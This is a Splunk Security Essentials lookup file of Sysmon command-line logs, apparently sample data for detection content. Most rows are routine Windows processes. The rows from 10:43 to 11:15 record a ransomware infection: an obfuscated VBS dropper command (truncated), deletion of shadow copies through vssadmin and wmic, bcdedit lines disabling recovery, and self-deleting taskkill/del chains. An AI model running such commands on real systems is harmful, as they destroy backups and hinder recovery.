admingit
/
Deploiement_Server
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
Branches Tags
${ item.name }
Create tag ${ searchTerm }
Create branch ${ searchTerm }
from '51f28ad3da'
${ noResults }
Deploiement_Server/deployment-apps/Splunk_Security_Essentials/lookups/STE_Sysmon_commandline.csv

53 KiB
Raw Blame History

1_timeCommandLinehost
22016-08-24T12:27:26.000-0600taskhost.exe C:\Windows\system32\defrag.exe -cwe8105desk
32016-08-24T12:27:24.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
42016-08-24T12:25:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
52016-08-24T12:25:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
62016-08-24T12:21:06.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
72016-08-24T12:17:35.000-0600"C:\Windows\system32\w32tm.exe" /stripchart /computer:we9041srv.waynecorpinc.local /dataonly /samples:1we8105desk
82016-08-24T12:17:33.000-0600"C:\Windows\system32\PING.EXE" we9041srv.waynecorpinc.local /n 2we8105desk
92016-08-24T12:17:33.000-0600"C:\Windows\system32\w32tm.exe" /query /sourcewe8105desk
102016-08-24T12:17:31.000-0600C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\BOBSMI~1.WAY\AppData\Local\Temp\RES958E.tmp" "c:\Users\bob.smith.WAYNECORPINC\AppData\Local\Temp\CSC958D.tmp"we8105desk
112016-08-24T12:17:31.000-0600"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\bob.smith.WAYNECORPINC\AppData\Local\Temp\l62oeljq.cmdline"we8105desk
122016-08-24T12:17:31.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
132016-08-24T12:17:31.000-0600C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\BOBSMI~1.WAY\AppData\Local\Temp\RES93AA.tmp" "c:\Users\bob.smith.WAYNECORPINC\AppData\Local\Temp\CSC93A9.tmp"we8105desk
142016-08-24T12:17:31.000-0600"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\bob.smith.WAYNECORPINC\AppData\Local\Temp\m7m1p90n.cmdline"we8105desk
152016-08-24T12:17:31.000-0600C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\BOBSMI~1.WAY\AppData\Local\Temp\RES936C.tmp" "c:\Users\bob.smith.WAYNECORPINC\AppData\Local\Temp\CSC936B.tmp"we8105desk
162016-08-24T12:17:31.000-0600"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\bob.smith.WAYNECORPINC\AppData\Local\Temp\skj1oiou.cmdline"we8105desk
172016-08-24T12:17:29.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
182016-08-24T12:17:29.000-0600C:\Windows\System32\sdiagnhost.exe -Embeddingwe8105desk
192016-08-24T12:17:29.000-0600C:\Windows\System32\svchost.exe -k swprvwe8105desk
202016-08-24T12:17:29.000-0600"taskhost.exe"we8105desk
212016-08-24T12:17:29.000-0600C:\Windows\system32\vssvc.exewe8105desk
222016-08-24T12:17:29.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
232016-08-24T12:17:29.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe21_ Global\UsGthrCtrlFltPipeMssGthrPipe21 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
242016-08-24T12:17:28.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
252016-08-24T12:17:28.000-0600C:\Windows\system32\mcbuilder.exewe8105desk
262016-08-24T12:17:28.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
272016-08-24T12:17:28.000-0600C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperationswe8105desk
282016-08-24T12:17:28.000-0600C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreationwe8105desk
292016-08-24T12:17:28.000-0600C:\Windows\system32\lpremove.exewe8105desk
302016-08-24T12:16:49.000-0600\??\C:\Windows\system32\conhost.exe 0xffffffffwe1149srv
312016-08-24T12:16:49.000-0600C:\Windows\system32\sc.exe start wuauservwe1149srv
322016-08-24T12:15:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
332016-08-24T12:15:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
342016-08-24T12:10:47.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
352016-08-24T12:10:47.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe20_ Global\UsGthrCtrlFltPipeMssGthrPipe20 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
362016-08-24T12:10:29.000-0600C:\Windows\system32\svchost.exe -k defragsvcwe8105desk
372016-08-24T12:10:28.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
382016-08-24T12:10:28.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
392016-08-24T12:10:28.000-0600"taskhost.exe"we8105desk
402016-08-24T12:10:28.000-0600C:\Windows\system32\defrag.exe -cwe8105desk
412016-08-24T12:10:28.000-0600C:\Windows\system32\aitagent.EXEwe8105desk
422016-08-24T12:10:28.000-0600C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdatewe8105desk
432016-08-24T12:07:08.000-0600taskhost.exe $(Arg0)we8105desk
442016-08-24T12:06:06.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
452016-08-24T12:05:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
462016-08-24T12:05:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
472016-08-24T12:03:00.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
482016-08-24T11:55:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
492016-08-24T11:55:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
502016-08-24T11:51:05.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
512016-08-24T11:45:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
522016-08-24T11:45:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
532016-08-24T11:39:35.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
542016-08-24T11:39:35.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe19_ Global\UsGthrCtrlFltPipeMssGthrPipe19 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
552016-08-24T11:36:52.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
562016-08-24T11:36:52.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe18_ Global\UsGthrCtrlFltPipeMssGthrPipe18 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
572016-08-24T11:36:05.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
582016-08-24T11:35:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
592016-08-24T11:35:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
602016-08-24T11:28:43.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
612016-08-24T11:27:21.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
622016-08-24T11:25:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
632016-08-24T11:25:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
642016-08-24T11:21:05.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
652016-08-24T11:18:10.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
662016-08-24T11:18:10.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe17_ Global\UsGthrCtrlFltPipeMssGthrPipe17 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
672016-08-24T11:15:29.000-0600ping -n 1 127.0.0.1we8105desk
682016-08-24T11:15:29.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
692016-08-24T11:15:29.000-0600taskkill /t /f /im "osk.exe"we8105desk
702016-08-24T11:15:29.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
712016-08-24T11:15:29.000-0600/d /c taskkill /t /f /im "osk.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\{35ACA89F-933F-6A5D-2776-A3589FB99832}\osk.exe" > NULwe8105desk
722016-08-24T11:15:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
732016-08-24T11:15:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
742016-08-24T11:15:13.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}we8105desk
752016-08-24T11:15:12.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-110916_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-110916 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"we8105desk
762016-08-24T11:15:12.000-0600"C:\Windows\System32\WScript.exe" "C:\Users\bob.smith.WAYNECORPINC\Desktop\# DECRYPT MY FILES #.vbs"we8105desk
772016-08-24T11:15:12.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
782016-08-24T11:15:12.000-0600"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2404 CREDAT:79874we8105desk
792016-08-24T11:15:11.000-0600"C:\Windows\system32\NOTEPAD.EXE" C:\Users\bob.smith.WAYNECORPINC\Desktop\# DECRYPT MY FILES #.txtwe8105desk
802016-08-24T11:15:11.000-0600"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2404 CREDAT:79873we8105desk
812016-08-24T11:15:11.000-0600"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohomewe8105desk
822016-08-24T11:14:23.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
832016-08-24T11:14:23.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe15_ Global\UsGthrCtrlFltPipeMssGthrPipe15 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
842016-08-24T11:12:47.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
852016-08-24T11:12:47.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe14_ Global\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
862016-08-24T11:12:15.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
872016-08-24T11:12:06.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
882016-08-24T11:11:54.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
892016-08-24T11:11:54.000-0600"C:\Windows\explorer.exe"we8105desk
902016-08-24T11:11:51.000-0600taskhost.exe $(Arg0)we8105desk
912016-08-24T11:10:01.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
922016-08-24T11:10:01.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe13_ Global\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
932016-08-24T11:08:47.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
942016-08-24T11:08:47.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe12_ Global\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
952016-08-24T11:06:46.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
962016-08-24T11:06:46.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe11_ Global\UsGthrCtrlFltPipeMssGthrPipe11 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
972016-08-24T11:06:39.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
982016-08-24T11:06:31.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
992016-08-24T11:06:05.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
1002016-08-24T11:06:01.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1012016-08-24T11:05:53.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1022016-08-24T11:05:47.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1032016-08-24T11:05:33.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1042016-08-24T11:05:19.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1052016-08-24T11:05:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
1062016-08-24T11:05:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
1072016-08-24T11:05:03.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1082016-08-24T11:04:55.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1092016-08-24T11:04:53.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1102016-08-24T11:04:33.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1112016-08-24T11:04:33.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1122016-08-24T11:04:31.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
1132016-08-24T11:04:31.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe10_ Global\UsGthrCtrlFltPipeMssGthrPipe10 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
1142016-08-24T11:02:36.000-0600C:\Windows\system32\AUDIODG.EXE 0x4d4we8105desk
1152016-08-24T11:02:36.000-0600rundll32.exe C:\Windows\system32\hotplug.dll,HotPlugEjectVetoed \\.\pipe\PNP_HotPlug_Pipe_1.{339df01b-6d4c-4d9a-b389-98d62839f1b0}we8105desk
1162016-08-24T11:02:29.000-0600C:\Windows\system32\DeviceDisplayObjectProvider.exe -Embeddingwe8105desk
1172016-08-24T11:02:15.000-0600C:\Windows\system32\DeviceDisplayObjectProvider.exe -Embeddingwe8105desk
1182016-08-24T10:56:55.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
1192016-08-24T10:56:55.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11099_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11099 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"we8105desk
1202016-08-24T10:56:54.000-0600"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:4576 CREDAT:71937we8105desk
1212016-08-24T10:56:51.000-0600"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohomewe8105desk
1222016-08-24T10:56:47.000-0600"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL D:\Work Stuff\013\013366.pdfwe8105desk
1232016-08-24T10:56:46.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1242016-08-24T10:56:43.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1252016-08-24T10:56:29.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1262016-08-24T10:56:19.000-0600"C:\Windows\explorer.exe"we8105desk
1272016-08-24T10:56:11.000-0600C:\Windows\system32\AUDIODG.EXE 0x2c4we8105desk
1282016-08-24T10:56:09.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1292016-08-24T10:56:08.000-0600"C:\Windows\explorer.exe"we8105desk
1302016-08-24T10:55:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
1312016-08-24T10:55:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
1322016-08-24T10:53:39.000-0600C:\Windows\System32\slui.exe -Embeddingwe8105desk
1332016-08-24T10:51:05.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
1342016-08-24T10:49:42.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
1352016-08-24T10:49:42.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe8_ Global\UsGthrCtrlFltPipeMssGthrPipe8 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
1362016-08-24T10:49:24.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
1372016-08-24T10:49:24.000-0600"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailureswe8105desk
1382016-08-24T10:49:24.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
1392016-08-24T10:49:24.000-0600"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled nowe8105desk
1402016-08-24T10:49:23.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
1412016-08-24T10:49:23.000-0600"C:\Windows\system32\wbem\wmic.exe" shadowcopy deletewe8105desk
1422016-08-24T10:49:23.000-0600C:\Windows\System32\svchost.exe -k swprvwe8105desk
1432016-08-24T10:49:23.000-0600C:\Windows\system32\vssvc.exewe8105desk
1442016-08-24T10:49:23.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
1452016-08-24T10:49:23.000-0600"C:\Windows\system32\vssadmin.exe" delete shadows /all /quietwe8105desk
1462016-08-24T10:49:22.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}we8105desk
1472016-08-24T10:49:22.000-0600C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}we8105desk
1482016-08-24T10:49:21.000-0600consent.exe 928 274 0000000001CCA4D0we8105desk
1492016-08-24T10:49:11.000-0600"C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\{35ACA89F-933F-6A5D-2776-A3589FB99832}\osk.exe"we8105desk
1502016-08-24T10:49:03.000-0600"C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\{35ACA89F-933F-6A5D-2776-A3589FB99832}\osk.exe"we8105desk
1512016-08-24T10:49:03.000-0600"C:\Windows\SysWOW64\QqJXZrBKCk72XzRgZs\AdapterTroubleshooter.exe"we8105desk
1522016-08-24T10:49:03.000-0600C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}we8105desk
1532016-08-24T10:49:03.000-0600consent.exe 928 502 00000000031D8160we8105desk
1542016-08-24T10:49:03.000-0600"C:\Windows\SysWOW64\QqJXZrBKCk72XzRgZs\AdapterTroubleshooter.exe"we8105desk
1552016-08-24T10:49:03.000-0600consent.exe 928 274 0000000001CCA4D0we8105desk
1562016-08-24T10:49:03.000-0600consent.exe 928 274 0000000001CCA4D0we8105desk
1572016-08-24T10:49:03.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}we8105desk
1582016-08-24T10:49:03.000-0600C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}we8105desk
1592016-08-24T10:49:02.000-0600consent.exe 928 274 0000000001CCA4D0we8105desk
1602016-08-24T10:49:01.000-0600"C:\Windows\SysWOW64\explorer.exe"we8105desk
1612016-08-24T10:48:50.000-0600"C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\{35ACA89F-933F-6A5D-2776-A3589FB99832}\osk.exe"we8105desk
1622016-08-24T10:48:42.000-0600ping -n 1 127.0.0.1we8105desk
1632016-08-24T10:48:41.000-0600taskkill /t /f /im "121214.tmp"we8105desk
1642016-08-24T10:48:41.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
1652016-08-24T10:48:41.000-0600/d /c taskkill /t /f /im "121214.tmp" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp" > NULwe8105desk
1662016-08-24T10:48:41.000-0600"C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\{35ACA89F-933F-6A5D-2776-A3589FB99832}\osk.exe"we8105desk
1672016-08-24T10:48:29.000-0600"C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp"we8105desk
1682016-08-24T10:48:21.000-0600"C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp"we8105desk
1692016-08-24T10:48:21.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
1702016-08-24T10:48:21.000-0600"C:\Windows\System32\cmd.exe" /C START "" "C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp"we8105desk
1712016-08-24T10:45:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
1722016-08-24T10:45:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
1732016-08-24T10:44:21.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1742016-08-24T10:44:08.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1752016-08-24T10:44:07.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1762016-08-24T10:43:54.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1772016-08-24T10:43:54.000-0600"C:\Windows\explorer.exe"we8105desk
1782016-08-24T10:43:27.000-0600C:\Windows\splwow64.exe 8192we8105desk
1792016-08-24T10:43:21.000-0600"C:\Windows\System32\WScript.exe" "C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\20429.vbs"we8105desk
1802016-08-24T10:43:21.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
1812016-08-24T10:43:21.000-0600cmd.exe /V /C set "GSI=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DIm RWRL" "FuNCtioN GNbiPp(Pt5SZ1)" "EYnt=45" "GNbiPp=AsC(Pt5SZ1)" "Xn1=52 This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be 